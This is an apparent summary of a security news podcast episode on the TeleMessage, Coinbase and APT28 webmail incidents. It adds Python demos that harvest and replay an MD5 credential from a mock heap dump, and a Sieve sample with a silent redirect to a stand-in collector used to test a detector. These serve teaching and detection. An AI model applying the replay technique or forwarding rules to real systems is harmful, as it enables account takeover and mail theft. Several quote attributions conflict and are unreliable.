Risky Business #792 Summary: "Beware, Coinbase Users. Crypto Thieves Are Taking Fingers Now"
Release Date: May 21, 2025
Host: Patrick Gray
Guest: Adam Boileau
Sponsor guest: Tony De la Fuente, Founder of Prowler
Introduction
In episode #792 of Risky Business, host Patrick Gray engages in an in-depth discussion with Adam Boileau, dissecting the latest developments in cybersecurity. The episode delves into significant breaches affecting major platforms like Telemessage and Coinbase, explores the evolving tactics of cyber adversaries, and examines the implications of these incidents on both individuals and organizations. Additionally, the episode features an insightful interview with Tony De la Fuente from Prowler, highlighting advancements in cloud security tools.
Telemessage Data Leak via DDoS Secrets
The episode kicks off with news that Distributed Denial of Secrets (DDoSecrets), the leak-publishing collective co-founded by Emma Best, has obtained roughly 400 gigabytes of heap dumps taken from Telemessage's message-archiving servers.
- Patrick Gray [00:00]: Introduces the issue, stating, “DDoS secrets... got its hands on 400 gig of like heap dumps from Telemessage’s message archiving servers.”
- Adam Boileau [01:28]: Explains the technical breach: “The Telemessage backend is written in Java and they're using the Spring Boot framework... somebody found this with a brute forcer and just started scraping memory every few minutes.”
The dumps came from the Spring Boot Actuator heapdump endpoint. Spring Boot 1.x exposed that endpoint without authentication unless the application was explicitly secured, whereas 2.x exposes only health and info over HTTP by default; left reachable, it hands any unauthenticated client a snapshot of the JVM heap, including credentials, session data and message content that happen to be in memory at the time.
- Patrick Gray [03:51]: Criticizes Telemessage’s flawed password handling: “They’re doing client-side MD5 hashing of passwords, then submitting the hash, so... you just use that to log in with.”
Because the server simply compares the submitted MD5 against the stored one, the stored hash is itself the credential: anyone who recovers it from a heap dump can log in without ever learning the password, and no cracking is required. Combined with the exposed endpoint, this made it trivial to scrape working credentials and confidential communications straight out of memory.
Implications:
- Government Exposure: The leaked data includes messages from government agencies such as Customs and Border Protection, raising national-security concerns.
- Technical Oversight: The incident underscores the need to lock down management endpoints (disable or authenticate the Actuator heapdump endpoint, and never expose it on an internet-facing host) and to hash passwords server-side with a salted, slow algorithm rather than accepting a client-computed hash as the login secret.
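The chain described above, as an added example (not code from the episode or from Telemessage): a constructed byte string stands in for a slice of an exposed heap dump, a scraper pulls the user record out of it, and the harvested MD5 logs straight in to a server that uses the client-side-hash scheme. The same record lifted from a server that hashes server-side with a per-user salt and scrypt is useless as a credential. The heap contents, the `com.example.archiver.User` record layout and the user `alice` are all constructed for the demonstration.

```python
import hashlib
import hmac
import os
import re

# Constructed stand-in for a few bytes of a JVM heap dump as an exposed Spring
# Boot Actuator /heapdump endpoint would return it: a user record the backend
# holds in memory, surrounded by unrelated heap noise. Not real TeleMessage data.
WEAK_HEAP_SLICE = (
    b"\x00\x05\x13sun.misc.Launcher\x00\x00"
    b"com.example.archiver.User{username=alice,"
    b"passwordHash=5f4dcc3b5aa765d61d8327deb882cf99}"
    b"\x00\x00java.lang.String\x00"
)

USER_RECORD_RE = re.compile(rb"username=([^,}]+),passwordHash=([0-9a-f]{32})")


def harvest_credentials(heap_bytes: bytes) -> list[tuple[str, str]]:
    """Pull (username, md5) pairs out of raw heap bytes; this is all a scraper
    polling the heapdump endpoint every few minutes needs to do."""
    return [(u.decode(), h.decode()) for u, h in USER_RECORD_RE.findall(heap_bytes)]


class WeakServer:
    """The scheme the episode criticises: the client MD5-hashes the password and
    submits the hash; the server stores the same MD5 and compares. Whatever sits
    in storage or in memory is also what the wire carries, so a dumped hash logs
    in directly and no cracking is needed."""

    def __init__(self) -> None:
        self.users = {"alice": hashlib.md5(b"password").hexdigest()}

    def login(self, username: str, submitted_hash: str) -> bool:
        stored = self.users.get(username)
        return stored is not None and hmac.compare_digest(stored, submitted_hash)


def weak_client_login(server: WeakServer, username: str, password: str) -> bool:
    """What the legitimate client does; an attacker with the hash skips this step."""
    return server.login(username, hashlib.md5(password.encode()).hexdigest())


class HardenedServer:
    """Server-side password hashing: the client sends the password itself (over
    TLS); the server derives a salted, memory-hard scrypt digest and stores only
    salt and digest. A record lifted from storage or a heap dump is not a usable
    credential, because login requires the password, not the digest.
    Caveat: this protects stored credentials only. A dump taken while a login is
    in flight still contains that plaintext password, so the heapdump endpoint
    itself must not be reachable (Spring Boot 2.x exposes only health and info
    over HTTP by default; do not widen management.endpoints.web.exposure.include
    on internet-facing hosts)."""

    SCRYPT = dict(n=2**14, r=8, p=1, dklen=32)  # 16 MiB per derivation

    def __init__(self) -> None:
        self.users: dict[str, tuple[bytes, bytes]] = {}

    def register(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[username] = (salt, hashlib.scrypt(password.encode(), salt=salt, **self.SCRYPT))

    def login(self, username: str, password: str) -> bool:
        record = self.users.get(username)
        if record is None:
            # Burn comparable time for unknown users so timing does not reveal valid usernames.
            hashlib.scrypt(password.encode(), salt=b"\0" * 16, **self.SCRYPT)
            return False
        salt, digest = record
        candidate = hashlib.scrypt(password.encode(), salt=salt, **self.SCRYPT)
        return hmac.compare_digest(candidate, digest)


def demo() -> tuple[bool, bool, bool]:
    """Returns (weak_replay_works, hardened_replay_fails, hardened_real_login_works)."""
    weak = WeakServer()
    harvested = harvest_credentials(WEAK_HEAP_SLICE)
    weak_replay_works = bool(harvested) and all(weak.login(u, h) for u, h in harvested)

    hard = HardenedServer()
    hard.register("alice", "password")
    _salt, digest = hard.users["alice"]  # what an attacker would lift from a dump
    hardened_replay_fails = not hard.login("alice", digest.hex())
    hardened_real_login_works = hard.login("alice", "password")
    return weak_replay_works, hardened_replay_fails, hardened_real_login_works


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

The `WeakServer` comparison uses `hmac.compare_digest` and is still broken: constant-time comparison does nothing for you when the value being compared is the thing the attacker already holds. The fix is in what is stored and what the client sends, not in how it is compared.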
Coinbase Breach and Its Implications
A significant portion of the episode focuses on a disturbing incident involving Coinbase, a leading cryptocurrency exchange.
- Patrick Gray [07:00]: Details the breach: “An overseas-based Coinbase support agent was cooperating with some sort of threat actor and handing over customer data to some extortionist.”
- Adam Boileau [09:27]: Highlights the severity: “The hash is the password... This information is everything that a thief would need... account balances.”
A bribed overseas support agent pulled customer records and passed them to an extortionist, who then tried to extort Coinbase. The exposed data reportedly included names, addresses, and account balances, which is enough to single out high-net-worth users ("whales") for targeted social engineering and, as the episode title warns, physical coercion.
- Violent Repercussions: The discussion turns to violent crime tied to leaked customer data, such as the attempted abduction of a Paymium executive’s daughter, underscoring the real-world danger of cyber extortion once victims can be located.
GovDelivery Email System Compromise
The conversation shifts to a breach affecting GovDelivery, an email alert system utilized by various government agencies.
- Patrick Gray [14:37]: Summarizes the incident: “Someone got their account compromised and it was being used to send scam messages.”
- Adam Boileau [15:54]: Analyzes the attack vector: “Either phished or info stealer.”
Because the scam mail went out through the genuine government notification platform and its real sender domain, it inherited the credibility and reputation recipients and mail filters rely on, making the phishing far more convincing than a lookalike domain would be.
Telegram’s Actions Against Blackmarket Services
Telegram has recently taken steps to curb illicit activities on its platform.
- Patrick Gray [17:14]: Notes Telegram's crackdown: “Blocked a couple of massive black market services... released a transparency report.”
- Adam Boileau [17:14]: Adds specifics: “[They] blocked WeDo Guarantee and Xinbi Guarantee, major fronts for money laundering.”
Despite these efforts, Telegram faces criticism for its handling of other issues, such as alleged censorship pressures related to the Romanian election and its stance during geopolitical tensions, particularly concerning Russia.
Cross-Site Scripting Attacks from APT28 (Fancy Bear)
Adam Boileau discusses a sophisticated campaign by APT28, also known as Fancy Bear.
- Adam Boileau [19:45]: Describes the attack: “They were setting up mail forwarding rules to send your email off to the Kremlin for ingest into their intelligence pipeline.”
The campaign targets open-source webmail platforms such as Roundcube, Horde, and Zimbra. A cross-site scripting flaw in the web client lets attacker-supplied HTML in a message execute in the victim's logged-in session when the message is viewed; the script then adds a forwarding rule so that incoming mail is copied to attacker-controlled addresses, giving persistent access to the organisation's correspondence without any malware on the endpoint. Victims included governments in Africa, the EU, and South America.
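A detection for the persistence mechanism described above, as an added example (not code from the episode or from any of the webmail projects): it assumes forwarding rules are stored as Sieve scripts, as they are in Roundcube's managesieve plugin, Horde's Ingo and Zimbra's filter rules on Dovecot-style backends, and it flags any `redirect` whose target domain is outside the organisation. The Sieve script, the `ORG_DOMAINS` set and the collector address are constructed for the example.

```python
import re

# Constructed Sieve script of the kind a webmail client stores per mailbox. The
# first rule is an ordinary user rule; the second is an attacker-style rule:
# unconditional, named with a bare ".", and using ":copy" so the victim still
# receives every message and notices nothing.
SAMPLE_SIEVE = r'''
require ["fileinto", "copy"];
# rule:[newsletters]
if header :contains "from" "news@example.org" {
    fileinto "Newsletters";
}
# rule:[.]
if true {
    redirect :copy "archive.sync@mail-collector.example.net";
}
'''

# Domains mail may legitimately be forwarded to (assumption for the example).
ORG_DOMAINS = {"example.org"}

REDIRECT_RE = re.compile(r'redirect\s+(:copy\s+)?"([^"]+)"', re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Drop /* */ and # comments so a redirect mentioned in a comment is not
    reported. Simplification: a '#' inside a quoted string is also cut."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.DOTALL)
    return "\n".join(line.split("#", 1)[0] for line in script.splitlines())


def find_external_redirects(script: str, org_domains: set[str]) -> list[dict]:
    """Return every redirect target outside org_domains, noting whether it is a
    silent ':copy' (the victim keeps the original, the classic exfil pattern)."""
    findings = []
    for copy_flag, address in REDIRECT_RE.findall(strip_comments(script)):
        domain = address.rsplit("@", 1)[-1].lower()
        if domain not in org_domains:
            findings.append({"address": address, "domain": domain, "silent": bool(copy_flag)})
    return findings


if __name__ == "__main__":
    for f in find_external_redirects(SAMPLE_SIEVE, ORG_DOMAINS):
        print(f"external forward to {f['address']} (silent copy: {f['silent']})")
```

On a Dovecot/Pigeonhole server the scripts to feed in come from `doveadm sieve list -u <user>` and `doveadm sieve get -u <user> <script>`; run the check across all mailboxes and alert on any new external redirect, since legitimate users rarely create silent, unconditional forwards to outside domains.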
Tax Fraud in Australia Through MyGov Compromises
The episode highlights emerging tax fraud tactics in Australia.
- Patrick Gray [21:27]: Reports on increased fraudulent tax returns: “Based on people getting their MyGov accounts compromised.”
- Adam Boileau [22:10]: Connects the dots: “These are transferable ways to turn personal information... into something monetizable.”
While the fraud is currently limited in scale, it shows that a compromised government identity account is directly monetizable: whoever controls a MyGov account can lodge returns in the victim's name, a threat to both personal finances and the tax system if it is industrialised.
High-Profile Cases: Eric Council Jr. and Power School Breach
Two notable cases underscore the personal and organizational impacts of cybersecurity breaches.
- Eric Council Jr.:
  - Patrick Gray [23:03]: Explains the incident: “He was paid $50K to perform a SIM swap and take over the SEC’s Twitter account, causing temporary bitcoin price fluctuations.”
  - Adam Boileau [24:04]: Discusses the sentencing: “He was sentenced to 14 months in prison and ordered to forfeit the $50K.”
- PowerSchool Breach:
  - Patrick Gray [25:19]: Details the breach: “Matthew Lane, a 19-year-old, compromised PowerSchool accounts, affecting data on approximately 60 million children.”
  - Adam Boileau [26:11]: Comments on the sentencing: “He’s looking at something like nine years over this thing.”
These cases illustrate the severe legal consequences of cybercrimes and the extensive damage inflicted on victims, ranging from financial losses to the exposure of sensitive personal data.
Ivanti Vulnerabilities and Their Exploits
The discussion transitions to another critical security issue involving Ivanti.
- Adam Boileau [34:31]: Outlines the vulnerabilities: “There was a bug chain being exploited to compromise Ivanti Endpoint management platforms...”
- Patrick Gray [36:05]: Criticizes Ivanti’s response: “They're not going to tell you which one... it’s like an auth bypass if there's no auth.”
The chain pairs an authentication bypass with a code-execution flaw in an open-source component Ivanti bundles (Hibernate Validator), giving unauthenticated attackers a path to running code on exposed Endpoint Manager Mobile servers. Gray's complaint is that Ivanti attributed the bugs to open-source libraries without saying which ones or how the two combine, leaving defenders to work it out. The episode treats it as a lesson about owning the security of third-party dependencies and the configuration around them, not just the vendor's own code.
Sponsor Spotlight: Prowler's Latest Releases
In the sponsored segment, Patrick Gray interviews Tony De la Fuente, founder of Prowler, an open-source cloud security platform.
- Tony De la Fuente [38:50]: Announces the release of Prowler 5.6 and introduces new tools, Prowler Hub and Prowler Studio, enhancing cloud security monitoring and compliance checks across various platforms, including Microsoft 365.
- Patrick Gray [43:04]: Emphasizes the value: “Instead of just some weird check... Prowler Hub explains what it is.”
- Tony De la Fuente [44:14]: Highlights the integration with AI in Prowler Studio: “Prowler Studio understands that using AI and creates the code for you... you can create your own custom checks.”
These tools aim to streamline cloud security management, offering both command-line and user-friendly interfaces to ensure robust security postures across diverse cloud environments.
Conclusion
Episode #792 of Risky Business provides a comprehensive overview of current cybersecurity challenges, from data breaches and cyber extortion to sophisticated state-sponsored attacks. The discussions emphasize the critical need for robust security practices, vigilant oversight of third-party dependencies, and the proactive development of security tools. The interview with Prowler underscores the community-driven efforts to enhance cloud security, offering valuable resources for professionals aiming to safeguard their infrastructures.
Listeners are encouraged to stay informed, adopt best security practices, and leverage advanced tools like Prowler to navigate the ever-evolving landscape of information security.
Notable Quotes:
- Patrick Gray [01:02]: “DDoS secrets... got its hands on 400 gig of like heap dumps from Telemessage’s message archiving servers.”
- Adam Boileau [03:51]: “They’re doing client-side MD5 hashing of passwords, then submitting the hash, so... you just use that to log in with.”
- Patrick Gray [07:00]: “This information is everything that a thief would need... account balances.”
- Adam Boileau [14:37]: “Either phished or info stealer.”
- Patrick Gray [32:44]: “These are people who you don't really want them being victimized again.”
- Tony De la Fuente [44:14]: “Prowler Studio understands that using AI and creates the code for you.”
For more detailed discussions and the latest in information security, tune into Risky Business weekly.
